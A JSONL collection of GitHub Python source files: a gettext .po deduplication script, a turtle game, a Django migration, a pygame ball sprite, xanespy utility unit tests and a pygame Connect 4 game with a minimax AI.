+{"seq_id":"10172053864","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\n\n#Gets a .po file (of l10n gettex strings) and returns it without duplicates\n\n#getUniquePOstrings.py []\n\n\n\nimport re\nimport sys\n\n\nif len(sys.argv)<2 or len(sys.argv)>3:\n sys.stderr.write(\"Usage: getUniquePOstrings.py []\\n\")\n exit(1)\n\n\ninfilename=sys.argv[1]\noutfilename=\"\"\ntry:\n outfilename=sys.argv[2]\nexcept:\n pass\n\ntry:\n ifh=open(infilename,\"r\")\nexcept:\n sys.stderr.write(\"File: \"+infilename+\" not found.\\n\")\n exit(2)\n\n\ntry:\n inlines=ifh.readlines()\nexcept:\n sys.stderr.write(\"File: \"+infilename+\". Read error.\\n\")\n exit(3)\n \nifh.close()\n\nif len(inlines)<=0:\n sys.stderr.write(\"File: \"+infilename+\". Empty file.\\n\")\n exit(4)\n\n\n\n#print inlines\n\n\ndatablocks=[]\nblock=[]\n\ncount=0\nfor line in inlines:\n if count==0:\n block=[line]\n elif count==1:\n block.append(line)\n else: # count ==2\n block.append(line)\n datablocks.append(block)\n \n count=(count+1)%3\n \n \n#print datablocks\n\n\n\nif outfilename==\"\":\n ofh=sys.stdout\nelse:\n try:\n ofh=open(outfilename,\"w\")\n except:\n sys.stderr.write(\"File: \"+infilename+\" not found.\\n\")\n exit(2)\n \n \n \n\nlinesdict={}\n\nfor block in datablocks:\n\n try: #Si ya existe la línea en el dict, la ignora\n linesdict[block[1]]\n except: #si no existe,la escribe en el resultado y la marca en el dict\n for line in block:\n ofh.write(line);\n linesdict[block[1]]=True\n\n \n\n\n \n\nif outfilename!=\"\":\n ofh.close()\n\n#New translation:\n# ISO to UTF. ScriptFile.sh\n# bash --dump-po-strings ScriptFile.sh > DestFile.pot\n# getUniquePOstrings.py DestFile.pot TranslationsFile.po\n# Copy to its language directory and translate\n# msgfmt -o CompiledTranslFile.mo TranslationsFile.po \n\n\n\n#To update:\n# ISO to UTF. ScriptFile.sh\n# bash --dump-po-strings ScriptFile.sh > NewTranslationsFile.pot\n# getUniquePOstrings.py DestFile.pot TranslationsFile.pot\n# msgmerge --update --previous --no-wrap CurrentTranslationsFile.po NewTranslationsFile.pot\n# Copy to its language directory and translate new strings\n# msgfmt -o CompiledTranslFile.mo TranslationsFile.po \n\n\n\n\n# ISO to UTF:\n#iconv --from-code=ISO-8859-1 --to-code=UTF-8 inFile > aux\n#mv -f aux outFile\n\n#Poner esta cabecera, para que coja bien el charset\n'''\n# Trad File\n#\n#, fuzzy\nmsgid \"\"\nmsgstr \"\"\n\"MIME-Version: 1.0\\n\"\n\"Content-Type: text/plain; charset=UTF-8\\n\"\n\"Content-Transfer-Encoding: 8bit\\n\"\n'''\n","repo_name":"Servicio-Informatica-Comunicaciones-UZ/VEL","sub_path":"src/build/localization-tools/getUniquePOstrings.py","file_name":"getUniquePOstrings.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39217718972","text":"import turtle\r\nimport time\r\nfrom turtle import Screen\r\n\r\n# window\r\nwn = turtle.Screen()\r\nwn.title(\"Molluscophobia: How to Defeat the Immortal Snail\")\r\nwn.bgcolor(\"black\")\r\nwn.bgpic(\"background_resized.gif\")\r\nwn.setup(width=1500, height=700)\r\nwn.tracer()\r\n\r\n# pen settings\r\npen = turtle.Turtle()\r\npen.speed(0)\r\npen.hideturtle()\r\npen.penup()\r\npen.color(\"black\")\r\n\r\nrunning = False\r\n\r\n\r\ndef start_game():\r\n global running\r\n\r\n start_message.clear()\r\n running = True\r\n\r\n\r\nwhile not running:\r\n screen = Screen()\r\n start_message = turtle.Turtle()\r\n start_message.hideturtle()\r\n start_message.penup()\r\n start_message.sety(160)\r\n start_message.write(\"Press SPACE to start and jump\", align=\"center\", font=(\"Courier\", 20, \"bold\"))\r\n\r\n screen.onkeypress(start_game, 'space')\r\n screen.listen()\r\n\r\n# score\r\npen.goto(600, 170)\r\npen.write(\"0\", move=False, align=\"center\", font=(\"Courier\", 25, \"normal\"))\r\n\r\n# draw ground\r\nGROUND_LEVEL = -120\r\npen.penup()\r\npen.goto(-1000, GROUND_LEVEL)\r\npen.pendown()\r\npen.goto(1000, GROUND_LEVEL)\r\npen.penup()\r\n\r\n# draw snail\r\nsnail = turtle.Turtle()\r\nsnail.speed(0)\r\nsnail.penup()\r\nturtle.register_shape(\"snaill.gif\")\r\nsnail.shape(\"snaill.gif\")\r\nsnail.goto(-580, GROUND_LEVEL + 50)\r\nsnail.dx = 0\r\nsnail.dy = 1\r\n\r\n# draw pipe\r\npipe = turtle.Turtle()\r\npipe.speed(0)\r\npipe.penup()\r\nturtle.register_shape(\"coinss.gif\")\r\npipe.shape(\"coinss.gif\")\r\npipe.goto(0, GROUND_LEVEL + 30)\r\npipe.dx = -15\r\npipe.dy = 0\r\n\r\n# draw goal\r\ngoal = turtle.Turtle()\r\ngoal.speed(0)\r\ngoal.penup()\r\nturtle.register_shape(\"pooo.gif\")\r\ngoal.shape(\"pooo.gif\")\r\ngoal.goto(500, GROUND_LEVEL + 100)\r\ngoal.dx = -15\r\ngoal.dy = 0\r\n\r\n# draw player\r\nplayer = turtle.Turtle()\r\nplayer.speed(0)\r\nplayer.penup()\r\nturtle.register_shape(\"huuman.gif\")\r\nplayer.shape(\"huuman.gif\")\r\nplayer.goto(-400, GROUND_LEVEL + 50)\r\nplayer.dx = 0\r\nplayer.dy = 1\r\n\r\n\r\n# Initialize game variables\r\nplayer.score = 0\r\n\r\ndef hide_all():\r\n pen.clear()\r\n pen.hideturtle()\r\n player.hideturtle()\r\n pipe.hideturtle()\r\n goal.hideturtle()\r\n snail.hideturtle()\r\n start_message.hideturtle()\r\n\r\nwhile running:\r\n # Update the screen\r\n\r\n pen.clear()\r\n start_message.clear()\r\n wn.update()\r\n\r\n # Add gravity\r\n gravity = -0.9\r\n player.dy += gravity\r\n\r\n # Move player\r\n y = player.ycor()\r\n y += player.dy\r\n player.sety(y)\r\n\r\n if GROUND_LEVEL - 10 < player.ycor() < GROUND_LEVEL + 60:\r\n def go_up():\r\n player.dy += 20\r\n if player.dy > 20:\r\n player.dy = 20\r\n\r\n\r\n # Keyboard binding\r\n wn.listen()\r\n wn.onkeypress(go_up, \"space\")\r\n\r\n # Bottom Border\r\n if player.ycor() < GROUND_LEVEL + 50:\r\n player.dy = 0\r\n player.sety(GROUND_LEVEL + 50)\r\n\r\n # Top Border\r\n if player.ycor() > GROUND_LEVEL + 200:\r\n player.dy = 0\r\n player.sety(GROUND_LEVEL + 200)\r\n\r\n # Move Pipe 1\r\n x = pipe.xcor()\r\n x += pipe.dx\r\n pipe.setx(x)\r\n\r\n # Move goal\r\n x = goal.xcor()\r\n x += goal.dx\r\n goal.setx(x)\r\n\r\n # Check for score\r\n player.score += 1\r\n pen.clear()\r\n pen.goto(600, 170)\r\n pen.write(player.score, move=False, align=\"center\", font=(\"Arial\", 25, \"normal\"))\r\n # high_score = player.score !!!\r\n\r\n # collision with pipe = game over\r\n if (abs(pipe.xcor() - player.xcor()) < 100) and (player.ycor() - pipe.ycor() < 100):\r\n time.sleep(0.2)\r\n hide_all()\r\n wn.bgpic(\"scarysnail.png\")\r\n pen.penup()\r\n pen.goto(0, 0)\r\n #highscore pen.write(player.score, move=False, align=\"center\", font=(\"Arial\", 70, \"normal\")) !!!\r\n\r\n # collision with goal = win\r\n if (abs(goal.xcor() - player.xcor()) < 20) and (player.ycor() - goal.ycor() < 100):\r\n time.sleep(0.4)\r\n hide_all()\r\n start_message.hideturtle()\r\n wn.bgpic(\"amongus.png\")\r\n\r\nwn.mainloop()\r\n","repo_name":"chicken8848/ctd1d","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9412769085","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('geographies', '0001_initial'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('people', '0001_initial'),\n ('programs', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Language',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('language_name', models.CharField(unique=b'True', max_length=100)),\n ('user_created', models.ForeignKey(related_name='videos_language_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_language_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='NonNegotiable',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('non_negotiable', models.CharField(max_length=500)),\n ('chapter', models.CharField(max_length=500)),\n ('days_after_sowing', models.CharField(max_length=500)),\n ('physically_verifiable', models.BooleanField(default=False, db_index=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Topic',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('topic_name', models.CharField(default=b'None', max_length=100)),\n ('user_created', models.ForeignKey(related_name='videos_topic_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_topic_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ],\n options={\n 'abstract': False,\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Video',\n fields=[\n ('time_created', models.DateTimeField(auto_now_add=True, null=True)),\n ('time_modified', models.DateTimeField(auto_now=True, null=True)),\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ('old_coco_id', models.BigIntegerField(null=True, editable=False)),\n ('title', models.CharField(max_length=200)),\n ('duration', models.TimeField(null=True, blank=True)),\n ('summary', models.TextField(blank=True)),\n ('women_featured', models.CharField(max_length=100, choices=[(b'Farming', b'Farming'), (b'Teaching', b'Teaching'), (b'Making Decisions', b'Making Decisions'), (b'Being Interviwed', b'Being Interviwed'), (b'Other Activities', b'Other Activities'), (b'Does not feature women', b'Does not feature women')])),\n ('approval_date', models.DateField(null=True, blank=True)),\n ('video_status', models.CharField(max_length=100, choices=[(b'Storyboard', b'Storyboard'), (b'Filming', b'Filming'), (b'Post Production', b'Post Production'), (b'Waiting for Approval', b'Waiting for Approval'), (b'Approved', b'Approved')])),\n ('youtubeid', models.CharField(max_length=20, blank=True)),\n ('language', models.ForeignKey(to='videos.Language')),\n ('other_persons_shown', models.ForeignKey(blank=True, to='people.Person', null=True)),\n ('partner', models.ForeignKey(verbose_name=b'Supply Partner', to='programs.Partner')),\n ('persons_shown', models.ManyToManyField(related_name='persons_shown', to='people.Person')),\n ('production_team', models.ManyToManyField(related_name='production_team', to='people.Animator')),\n ('topic', models.ForeignKey(related_name='topic', to='videos.Topic')),\n ('user_created', models.ForeignKey(related_name='videos_video_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('user_modified', models.ForeignKey(related_name='videos_video_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True)),\n ('village', models.ForeignKey(to='geographies.Village')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AlterUniqueTogether(\n name='video',\n unique_together=set([('title', 'topic', 'village')]),\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='topic',\n field=models.ForeignKey(to='videos.Topic'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='user_created',\n field=models.ForeignKey(related_name='videos_nonnegotiable_created', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='nonnegotiable',\n name='user_modified',\n field=models.ForeignKey(related_name='videos_nonnegotiable_related_modified', blank=True, editable=False, to=settings.AUTH_USER_MODEL, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"digitalgreenorg/dg_MQED","sub_path":"videos/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13131390118","text":"import pygame\nimport math\nfrom constants import *\n\n# This sprite class represents the ball\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super(Ball, self).__init__()\n self.x = x\n self.y = y\n self.image = pygame.image.load(IMAGE_BALL).convert_alpha()\n self.rect = self.image.get_rect()\n self.rect.centerx = self.x\n self.rect.centery = self.y\n self.velocity = BALL_INITIAL_VELOCITY\n self.direction = BALL_INITIAL_DIRECTION\n\n def bounce(self, difference):\n self.direction = (180 - self.direction - difference) % 360\n\n def move(self, delta_x, delta_y):\n self.x += delta_x\n self.y += delta_y\n # update image position\n self.rect.centerx = self.x\n self.rect.centery = self.y\n\n def update(self):\n\n # convert to use radians, requirement of cos, sin\n direction_radian = math.radians(self.direction)\n\n # update current position\n self.x += self.velocity * math.sin(direction_radian)\n self.y -= self.velocity * math.cos(direction_radian)\n\n # check for boundaries\n\n # top\n if self.y <= BALL_RADIUS:\n self.bounce(0)\n self.y = BALL_RADIUS\n\n # left\n if self.x <= BALL_RADIUS:\n self.bounce(180)\n self.x = BALL_RADIUS\n\n # right\n if self.x + BALL_RADIUS >= SCREEN_WIDTH:\n self.bounce(180)\n self.x = SCREEN_WIDTH - BALL_RADIUS\n\n # update image position\n self.rect.centerx = self.x\n self.rect.centery = self.y\n\n def draw(self, display):\n display.blit(self.image, self.rect.topleft)\n\n def getDamage(self):\n return BALL_DAMAGE\n","repo_name":"mshi/bricks","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"73712097179","text":"from unittest import TestCase, mock\nimport math\nimport sys\nimport os\nimport multiprocessing\nfrom time import sleep\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))\n\nimport numpy as np\n\nfrom xanespy.utilities import (Extent, xy_to_pixel, xycoord, Pixel,\n pixel_to_xy, get_component,\n broadcast_reverse, is_kernel, prog,\n nproc, mp_map)\n\n\ndef add_one(x):\n \"\"\"Simple function for testing multiprocessing.\"\"\"\n return x+1\n\n\nclass UtilitiesTest(TestCase):\n def test_nproc(self):\n cpu_count = multiprocessing.cpu_count()\n # Test if it handles a simple number\n processes = nproc(5)\n self.assertEqual(processes, 5)\n # Test if it handles all CPUs (default)\n processes = nproc(None)\n self.assertEqual(processes, cpu_count)\n # Test if it handles negative numbers\n processes = nproc(-1)\n self.assertEqual(processes, cpu_count-1)\n # Test if it handles excessively negative numbers\n processes = nproc(-cpu_count-1)\n self.assertEqual(processes, 1)\n \n def mp_map(self):\n func = add_one\n # Try it with one processes\n result = mp_map(func, (0, 1, 3), ncore=1)\n np.testing.assert_equal(result, (1, 2, 4))\n # Try it with multiple processes\n result = mp_map(func, (0, 1, 3), ncore=2)\n np.testing.assert_equal(result, (1, 2, 4))\n \n def test_broadcast_reverse(self):\n orig = np.zeros(shape=(7, 48))\n target_shape = (7, 48, 958, 432)\n response = broadcast_reverse(orig, shape=target_shape)\n self.assertEqual(response.shape, target_shape)\n \n def test_interpret_complex(self):\n j = complex(0, 1)\n cmplx = np.array([[0+1j, 1+2j],\n [2+3j, 3+4j]])\n # Check modulus\n result = get_component(cmplx, 'modulus')\n mod = np.array([[1, np.sqrt(5)],\n [np.sqrt(13), 5]])\n np.testing.assert_array_equal(result, mod)\n # Check phase\n result = get_component(cmplx, 'phase')\n phase = np.array([[math.atan2(1, 0), math.atan2(2, 1)],\n [math.atan2(3, 2), math.atan2(4, 3)]])\n np.testing.assert_array_equal(result, phase)\n # Check real component\n result = get_component(cmplx, 'real')\n real = np.array([[0, 1],\n [2, 3]])\n np.testing.assert_array_equal(result, real)\n # Check imaginary component\n result = get_component(cmplx, 'imag')\n imag = np.array([[1, 2],\n [3, 4]])\n np.testing.assert_array_equal(result, imag)\n # Check if real data works ok\n real = np.array([[0, 1],[1, 2]])\n np.testing.assert_array_equal(get_component(real, \"modulus\"), real)\n \n def test_xy_to_pixel(self):\n extent = Extent(\n left=-1000, right=-900,\n top=300, bottom=250\n )\n # Try an x-y value in the middle of a pixel\n result = xy_to_pixel(\n xy=xycoord(x=-975, y=272.5),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=6, horizontal=2))\n # Try an x-y value right on the edge of a pixel\n result = xy_to_pixel(\n xy=xycoord(x=-950, y=250),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=9, horizontal=5))\n # Try an x-y value at the edge of the image\n result = xy_to_pixel(\n xy=xycoord(x=-900, y=250),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=9, horizontal=9))\n result = xy_to_pixel(\n xy=xycoord(x=-1000, y=300),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, Pixel(vertical=0, horizontal=0))\n \n def test_pixel_to_xy(self):\n extent = Extent(\n left=-1000, right=-900,\n top=300, bottom=250\n )\n result = pixel_to_xy(\n pixel=Pixel(vertical=9, horizontal=4),\n extent=extent,\n shape=(10, 10)\n )\n self.assertEqual(result, xycoord(x=-955., y=252.5))\n","repo_name":"canismarko/xanespy","sub_path":"tests/test_utilities.py","file_name":"test_utilities.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"32400540621","text":"#Reference:\r\n#https://www3.nd.edu/~pbui/teaching/cdt.30010.fa16/project01.html\r\n\r\n\r\nimport time\r\nimport pygame\r\nimport sys\r\nimport math\r\nimport random\r\nfrom AI import *\r\n\r\n\r\nclass Connect4Board:\r\n def __init__(self,rows=6, columns=7):\r\n ''' Creates empty Connect 4 board \r\n @param: rows. Number of rows for the board. Default = 6\r\n @param: columns. Number of columns for the board. Default = 7\r\n @return: None\r\n @raises: None\r\n\r\n '''\r\n self.board = []\r\n self.nrows = rows\r\n self.ncolumns = columns\r\n self.piece_one = 'x'\r\n self.piece_two = 'o'\r\n\r\n self.SQUARESIZE = 100 #parameters for the board\r\n self.COLUMN_COUNT = self.ncolumns\r\n self.ROW_COUNT = self.nrows\r\n self.width = self.COLUMN_COUNT * self.SQUARESIZE\r\n self.height = (self.ROW_COUNT+1) * self.SQUARESIZE\r\n self.size = (self.width,self.height)\r\n self.screen = pygame.display.set_mode(self.size)\r\n\r\n for row in range(rows):\r\n board_row = []\r\n for column in range(columns):\r\n board_row.append(' ')\r\n self.board.append(board_row)\r\n\r\n \r\n\r\n\r\n def print_board(self):\r\n ''' Prints Connect 4 board in nice format '''\r\n for row in self.board:\r\n print (\"|\" + \"|\" .join(row) + \"|\")\r\n\r\n\r\n def drop_piece(self,column, piece): \r\n ''' Attempts to drop specified piece into the board at the\r\n specified column. If this succeeds, return True. \r\n @param column: The column to insert on\r\n @param piece: The piece to be inserted\r\n @return: True if piece successfully dropped.\r\n @raises: Exception. When the column is fully occupied. \r\n '''\r\n \r\n try:\r\n for i in range(self.nrows-1,-1,-1):\r\n if self.board[i][column] == ' ':\r\n self.board[i][column] = piece\r\n return True\r\n \r\n raise Exception(\"Not a valid input for column: \" + str(column)) \r\n #When the column has already been fully occupied\r\n except IndexError:\r\n print('Not a valid column. Valid columns: 0 to ' + str(self.ncolumns-1))\r\n\r\n\r\n def has_winner(self,piece, n_seq = 4,): \r\n ''' Returns the position of first winning sequence encountered or False if none encountered in board\r\n @param board: The Connect 4 board instance\r\n @param n_seq: Number of pieces for winning sequence. Default = 4\r\n @return: Position of winning sequence or False if board does not have winning sequence.\r\n @raises: None \r\n '''\r\n found = False\r\n for row in range(self.nrows):\r\n for col in range(self.ncolumns):\r\n if self.board[row][col] == piece:\r\n \r\n retVal = self.check_piece(row,col,n_seq)\r\n if retVal != False:\r\n return True\r\n return found\r\n \r\n \r\n\r\n def check_piece(self,row,column,n_seq = 4):\r\n ''' Check whether there is a winning sequence of 4 pieces at position (row,column) in board\r\n @param row: index of row in the board\r\n @param column: index of column in the board\r\n @param n_seq: Number of pieces for winning sequence. Default = 4\r\n @return: (row,column) parameters if it is part of a 4 sequence or False otherwise\r\n @raises: None \r\n '''\r\n\r\n DIRECTIONS = (\r\n (-1, -1), (-1, 0), (-1, 1),\r\n ( 0, -1), ( 0, 1),\r\n ( 1, -1), ( 1, 0), ( 1, 1),\r\n )\r\n \r\n for dr, dc in DIRECTIONS:\r\n found_winner = True\r\n \r\n for i in range(1,n_seq):\r\n r = row + dr*i\r\n c = column + dc*i\r\n \r\n \r\n if r not in range(0,self.nrows) or c not in range(0,self.ncolumns): #check if within boundary of board. If not stop checking that direction and move on to next direction.\r\n found_winner = False\r\n break\r\n \r\n else: \r\n \r\n if self.board[r][c] != self.board[row][column]: #check if the current checked cell has same cell as original point\r\n found_winner = False\r\n break\r\n \r\n \r\n if found_winner == True:\r\n return (row,column)\r\n \r\n return False\r\n\r\n\r\n def get_winner(self,row,column):\r\n ''' Returns the winner (player1 or player2) who forms a 4 squence at position row,column in board\r\n @param row: index of row in the board\r\n @param column: index of column in the board\r\n @return: String: \"Player 1\" or \"Player 2\"\r\n @raises: Exception: if the position is empty. Used only for cases where called outside game loop. \r\n '''\r\n try:\r\n if self.board[row][column] == \"x\":\r\n return \"Player 1\"\r\n elif self.board[row][column] == \"o\":\r\n return \"Player 2\"\r\n else:\r\n raise Exception(\"Position at \" + str(row) + \",\" + str(column) + \" is empty.\" )\r\n\r\n except IndexError:\r\n print(\"get_winner called with wrong winning position\")\r\n\r\n\r\n \r\n def previous_row(self,column):\r\n ''' Returns the index of the row which is the highest (last played/last inserted) in a particular column\r\n @param column: index of column in the board\r\n @return: int: index of row. If column has no pieces return False\r\n @raises: Exception: if column outside of boundary of board\r\n '''\r\n if abs(column) >= self.ncolumns:\r\n raise Exception(\"Column does not exist in the board. Must be between 0 and \" + str(self.ncolumns-1))\r\n \r\n \r\n for i in range(0,self.nrows,1):\r\n if self.board[i][column] == self.piece_one or self.board[i][column] == self.piece_two:\r\n return i\r\n return False\r\n \r\n\r\n def draw_board(self):\r\n ''' Create a user interface of the connect 4 board\r\n @param None\r\n @return: None\r\n @raises: None\r\n '''\r\n for c in range(self.ncolumns):\r\n for r in range(self.nrows):\r\n pygame.draw.rect(self.screen, (0,0,255), (c*self.SQUARESIZE, r*self.SQUARESIZE + self.SQUARESIZE, self.SQUARESIZE, self.SQUARESIZE)) #draw rectangle\r\n\r\n if self.board[r][c] == ' ': #if position does not have any input, draw black circle\r\n pygame.draw.circle(self.screen, (0,0,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n elif self.board[r][c] == self.piece_one: #if contains player 1 input, draw red circle\r\n pygame.draw.circle(self.screen, (255,0,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n else: #if contains player 2 input, draw yellow circle\r\n pygame.draw.circle(self.screen, (255,255,0), (int(c*self.SQUARESIZE + self.SQUARESIZE/2), int(r*self.SQUARESIZE + self.SQUARESIZE + self.SQUARESIZE/2)), int(self.SQUARESIZE/2 - 5))\r\n pygame.display.update() #update to show changes\r\n\r\n\r\n\r\ndef main():\r\n board = Connect4Board(6,7)\r\n game_over = False\r\n \r\n #reference for GUI: https://www.youtube.com/watch?v=SDz3P_Ctm7U&t=7s\r\n pygame.init() \r\n board.draw_board() #draw the empty board based on the instance dimension\r\n pygame.display.update() #update based on draw_board function\r\n\r\n myfont = pygame.font.SysFont(\"monospace\", 75)\r\n #game loop\r\n board.print_board()\r\n\r\n #turn = random.randint(0,1)\r\n turn = 0\r\n while not game_over:\r\n\r\n \r\n \r\n for event in pygame.event.get(): #allow to quit by clicking exit button\r\n if event.type == pygame.QUIT: \r\n sys.exit()\r\n \r\n if event.type == pygame.MOUSEMOTION: #add animation of moving the piece\r\n pygame.draw.rect(board.screen, (0,0,0) , (0,0, board.width,board.SQUARESIZE)) #draw black rectangle to remove overlapping circles\r\n posx = event.pos[0]\r\n if turn == 0: #player 1 turn, draw red circle\r\n pygame.draw.circle(board.screen, (255,0,0), (posx, int(board.SQUARESIZE/2 )),int(board.SQUARESIZE/2 - 5))\r\n else: #player 2 turn, draw red circle\r\n pygame.draw.circle(board.screen, (255,255,0), (posx, int(board.SQUARESIZE/2 )),int(board.SQUARESIZE/2 - 5))\r\n pygame.display.update()\r\n\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN: #event where mouse clicked\r\n pygame.draw.rect(board.screen, (0,0,0) , (0,0, board.width,board.SQUARESIZE)) #draw black rectangle to remove overlapping circles\r\n #print(event.pos)\r\n # #Player 1 input\r\n if turn == 0:\r\n posx = event.pos[0] #access the x position of tuple\r\n userInput = int(math.floor(posx/board.SQUARESIZE)) #first column = 0 to 100, sec col = 100 to 200, etc. \r\n #userInput = input(\"Which column selected?: \")\r\n \r\n try:\r\n board.drop_piece(int(userInput),board.piece_one)\r\n board.print_board()\r\n board.draw_board()\r\n #check_winner = board.has_winner() #Might change this to check only the last inserted location instead of all the positions in board\r\n \r\n #prevRow = board.previous_row(int(userInput))\r\n check_winner = board.has_winner(piece= board.piece_one) #Need to check all possible locations. Cannot check just starting from the last inserted position\r\n #check_winner = board.check_piece(prevRow,int(userInput))\r\n \r\n if check_winner == True: #if current turn results in winning state, end. else continue\r\n game_over = True\r\n \r\n # #Get the winner at position check_winner[0],check_winner[1]\r\n # player_winner = board.get_winner(check_winner[0],check_winner[1])\r\n \r\n # print(\"Game Over. The winner is: \" + player_winner)\r\n \r\n #Leave it as player1, since anyway player2 makes a winning move this round, otherwise would have detected player1 before or earlier\r\n print(\"Game Over. The winner is: Player 1\")\r\n \r\n label = myfont.render(\"Player 1 Wins!\",1, (255,0,0)) #show on screen\r\n board.screen.blit(label, (40,10))\r\n pygame.display.update() #update to show changes\r\n pygame.time.wait(3000) #give 3 seconds before automatic close window\r\n \r\n else:\r\n turn = 1\r\n\r\n except IndexError:\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n except Exception: #If didn't insert correctly\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n \r\n #AI input\r\n if turn == 1:\r\n \r\n #AI input\r\n boardAI = Connect4AI(board) #Pass in the board to the AI to create the tree. \r\n \r\n #check next best location\r\n #userInput = boardAI.pick_best_move()\r\n\r\n #minimax algorithm\r\n userInput,value = boardAI.minimax(boardAI.tree.root,3,True)\r\n \r\n #userInput = int(math.floor(posx/board.SQUARESIZE)) #first column = 0 to 100, sec col = 100 to 200, etc. GUI user input\r\n #userInput = input(\"Which column selected?: \") #Manual input in console\r\n \r\n try:\r\n board.drop_piece(int(userInput),board.piece_two)\r\n board.print_board()\r\n board.draw_board()\r\n\r\n #check_winner = board.has_winner() #Might change this to check only the last inserted location instead of all the positions in board\r\n\r\n #prevRow = board.previous_row(int(userInput))\r\n check_winner = board.has_winner(piece = board.piece_two) #Need to check all possible locations. Cannot check just starting from the last inserted position\r\n #check_winner = board.check_piece(prevRow,int(userInput))\r\n\r\n if check_winner == True: #if current turn results in winning state, end. else continue\r\n game_over = True\r\n #Get the winner at position check_winner[0],check_winner[1]\r\n #player_winner = board.get_winner(check_winner[0],check_winner[1])\r\n\r\n #print(\"Game Over. The winner is: \" + player_winner) \r\n #Leave it as player2, since anyway player2 makes a winning move this round, otherwise would have detected player1 before or earlier\r\n print(\"Game Over. The winner is: Player 2\")\r\n\r\n label = myfont.render(\"Player 2 Wins!\",1, (255,255,0)) #show on screen\r\n board.screen.blit(label, (40,10))\r\n pygame.display.update() #update to show changes\r\n pygame.time.wait(3000) #give 3 seconds before automatic close window\r\n\r\n else:\r\n turn = 0\r\n \r\n except IndexError:\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n except Exception: #If didn't insert correctly\r\n print(\"Try Again\")\r\n board.print_board()\r\n continue\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"GohNgeeJuay/Connect4AI","sub_path":"Connect4.py","file_name":"Connect4.py","file_ext":"py","file_size_in_byte":14740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
